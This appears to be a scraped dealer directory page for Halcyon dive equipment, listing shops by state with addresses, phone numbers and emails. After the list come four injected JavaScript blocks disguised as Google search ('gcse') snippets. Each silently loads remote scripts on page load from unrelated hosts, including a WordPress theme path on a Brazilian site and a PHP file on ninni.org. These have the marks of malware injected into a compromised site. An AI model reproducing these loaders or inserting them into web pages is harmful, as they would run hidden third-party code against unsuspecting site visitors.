Dealers

DISTRIBUTOR

Florida

Halcyon Manufacturing 24587 NW 178th Place High Springs FL 32643 USA: 800.HALCYON halcyon.net ken@halcyon.net

DEALERS

Alaska

Dive Alaska 9191 Old Seaward Hwy Anchorage AK 99515 907.770.1778  divealaska.net scottanderson@gci.net

California

Any Water Sports 1344 Saratoga Ave San Jose CA 95129 708.244.4433 anywater.com awsdive@anywater.com
Hollywood Divers 3575 Cahuengan Blvd. Los Angeles CA 90068 877.657.2822 hollywooddivers.com karim@gue.com

Connecticut

Scuba Shack 1765 Silas Deane Hwy Rocky Hill CT 06067 860.563.0119  scubashackct.com edward_p_hayes@sbcglobal.net

Florida

Extreme Exposure 15 South Main St High Springs FL 32643 386.454.8158 extreme-exposure.com info@extreme-exposure.com
Add Helium 4530 Arnold Ave Naples FL 34104 239.300.0913 addhelium.com info@addhelium.com

Illinois

Dive Right In Scuba 24222 W. Lockport St Plainfield IL 60544 815.267.8400 diverightinscuba.com mike@diverightinscuba.com

Maryland

Submerged, Inc. 5609 Fishers Ln#3A Rockville MD 20852 301.881.2831 submergedonline.com info@submergedonline.com

Massachusetts

Andy’s Sport Shop 216 Daniels St Fitchburg MA 01420 978.343.6330 andyssportshop.com andyssportshop@gmail.com

New Jersey

Treasure Cove Divers 407 South Ave West Westfield NJ 07090 908.654.8808 www.treasurecovedivers.com rj@treasurecovedivers.com
DiveSeekers 856 Rt. 206 Hillsborough NJ 8844 908.359.1250 www.DiveSeekers.com sales@diveseekers.com

Pennsylvania

Scubadelphia 7714 Castor Ave. Philadelphia PA 19152 267.343.5590 scubadelphia.com dave@scubadelphia.com
Scuba Central PA 2542 Eastern Blvd Philadelphia PA 17402 717.793.2654 scubacentralpa.com info@scubacentralpa.com

Utah

Dive Addicts 14711 Draper View Cove Draper UT 84020 801.571.5111 diveaddicts.com josh@diveaddicts.com

Wisconsin

Diversions Scuba 5504 University Ave Madison WI 53705 608.441.2545 diversions-scuba.com isaac@diversions-scuba.com

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();